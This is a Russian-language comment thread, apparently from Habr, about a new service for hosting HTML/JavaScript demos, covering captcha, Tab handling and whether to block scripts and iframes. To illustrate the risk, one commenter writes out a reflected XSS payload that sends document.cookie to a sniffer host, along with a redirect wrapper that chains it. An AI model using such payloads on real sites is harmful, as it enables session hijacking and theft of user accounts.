Comments
А где capcha?
внесу в закладки, неплохо, может быть запретить javascriptы всяких редиректов и т.д., если сервис станет популярным, то, допустим на фрилансе говоришь заказчику — я хочу вот так вот demopreview.xexo.info/demo/view/b7c336729412877c4b6ffbef8d3a946e.html, а там бац, использование пассивной XSS какого-нибудь сайта (небойтесь, там всего-лишь редирект на хабр).
Как раз составлял список exception'ов
спасибо
Ээ, как вы представляете там XSS?
Ну редирект на другой ресурс. Грубо на: site.com/search.php?q="><sсript>alert('КуКу')</sсript>
ну допустим кто-то нашёл XSS на Yandex (что-нибудь аля shop.yandex.ru/?category="><script>window.location='http://sniff-here.com/?'+document.cookie</script>), т.е. кто зайдёт туда у того угонятся кукисы, и в этом сервисе создать демонстрацию:
<script>
window.location='http://shop.yandex.ru/?category="><script>window.location=\'http://sniff-here.com/?\'+document.cookie</script>';
</script>
Сначала редирект на XSS, а с XSS редирект на снифер с куками.
<script>
window.location='http://shop.yandex.ru/?category="><script>window.location=\'http://sniff-here.com/?\'+document.cookie</script>';
</script>
Сначала редирект на XSS, а с XSS редирект на снифер с куками.
Это уже XSS у Yandex.
С такойже простотой может человек использовать и .narod.ru и ещё много мест где выложить свой html.
И тут запрещать что то нет смысла, во первых javascript очень гибкий язык и любые запреты можно будет обойти а во вторых это уже ограничивает свободу на этом ресурсе (например я не смогу выложить пример с document.cookie или window.location если их запретят)
С такойже простотой может человек использовать и .narod.ru и ещё много мест где выложить свой html.
И тут запрещать что то нет смысла, во первых javascript очень гибкий язык и любые запреты можно будет обойти а во вторых это уже ограничивает свободу на этом ресурсе (например я не смогу выложить пример с document.cookie или window.location если их запретят)
+ запретить iframe и тому подобное, тоже из-за безопасности и что бы не было рекламы с кучей попапов.
и сделать сервис совсем бесполезным? XD
интересно, а если кто хочет показать пример именно с iframe, frameset и т.п.? Думаю просто не нужно тупо ходить по всем ссылкам которые встречаешь. Это ведь может провернуть кто угодно и на своем хомяке. Хотя заставил задуматься, да.
без аналитикса совсем никак?
Если очень критично могу убрать или поставить другое что-нибудь.
я к тому, что иногда требуется полный контроль над страницей, а не только над внутренностями body.
например, подключить xslt, прописать xmlns, мету для ie8…
например, подключить xslt, прописать xmlns, мету для ie8…
можно сделать что то типа такого: грузится страничка с iframe src= «url» и url заменяется на iframe.html с вашего сервера. и рядом ссылка вида «Если хотите посмотреть с включеным iframe жмякните сюда». Ну и для js тож самое можно, что б пользователь сам выбирал что ему смотреть.
Зачем такие сложности то?
Вы поупапов боитесь? А на сайт который в первый раз заходите, не боитесь поупапов?
Тут максимум удобности для разработчика.
Вы поупапов боитесь? А на сайт который в первый раз заходите, не боитесь поупапов?
Тут максимум удобности для разработчика.
угу, безумно боюсь, так боюсь что аж кушать не могу. попап привел для примера. можно засунуть любую гадость начинаю от adware заканчивая чем угодно. советую взять за правило, что приложения должно быть сначала безопастным для пользователя и только потом удобным.
Простите, допустил не простительную оплошность, скоро все верну на место.
На счет ограничений по Javascript, посмотрите на этот код. Я право, не знаю как с ним бороться. Посему накладываю ответственность, на автора, а также на выложившего ссылку для публичного или личного доступа
Пошел смотреть kcaptcha. Подом подумал, что нет ничего проще как с помощью нативного проView, забивать данные в поле капчи нужные данные)))
всётакие ее и поставлю)
всётакие ее и поставлю)
DOCTYPE в выпадайке?
Хабраэффект го! :)
Хьасан, суна хаар хьо Iийра воций цхьаъ ца дича ;-)
Дала аьтто бойл!
Дала аьтто бойл!
Нажатие клавиши Tab полезно перехватывать и вставлять горизонтальный отступ (как в обычных редакторах кода), иначе сервис можно будет использовать только в режиме копирования/вставки.
А почему лого на php, а превью только js/html?
если всё будет путем, в выходные будет обновление, причем интересное
Sign up to leave a comment.
Source.bz — Сервис демонстраций